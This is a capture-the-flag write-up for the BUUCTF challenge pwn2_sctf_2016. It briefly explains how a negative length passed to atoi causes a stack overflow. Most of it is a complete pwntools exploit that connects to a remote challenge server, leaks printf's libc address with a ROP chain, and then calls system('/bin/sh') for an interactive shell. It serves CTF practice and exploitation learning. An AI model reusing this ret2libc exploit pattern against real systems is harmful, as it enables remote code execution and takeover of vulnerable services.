buuctf pwn2_sctf_2016

pwn2_sctf_2016

degree of difficulty： 2

source of the challenges：buuctf/sctf_2016

solving ideas：Stack overslow，atoi-function’s negative number overslow

Put it in IDA32,we can see this easy program.


len can be a negative number,witch can lead to that a negative number be overflowed to a int number witch is vary bigger than v5.
Therefore it result in a stack overflow bug .
exp：

from pwn import *
from LibcSearcher import *

#io=process("./pwn2_sctf_2016")
io=remote("node3.buuoj.cn",29069)
elf=ELF("./pwn2_sctf_2016")
context.log_level='debug'

print_got=elf.got['printf']
print_plt=0x8048370
vlun_addr=0x0804852F
#bss=0x0804a040+0x100

#gdb.attach(io,"b *0x080485EE")
io.recvuntil("How many bytes do you want me to read?")
io.sendline("-10")
io.recvuntil("Ok, sounds good.")
print("print_plt:0x%x\nprint_got:0x%x"%(print_plt,print_got))
payload='a'*0x2c+'a'*4+p32(print_plt)+p32(vlun_addr)+p32(print_got)
io.sendline(payload)
io.recvuntil("\x0c\xa0\x04\x08\x0a")#p32(print_got)+'\x0a'
print_addr=u32(io.recv(4))
print("print_addr:0x%x"%print_addr)

libc=LibcSearcher("printf",print_addr)
libc_base=print_addr-libc.dump('printf')
sys_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')
print("sys-addr:0x%x\n"%sys_addr)

io.recvuntil("How many bytes do you want me to read?")
io.sendline("-10")
io.recvuntil("Ok, sounds good.")

payload='a'*0x2c+'a'*4+p32(sys_addr)+p32(vlun_addr)+p32(bin_addr)
io.sendline(payload)

io.interactive()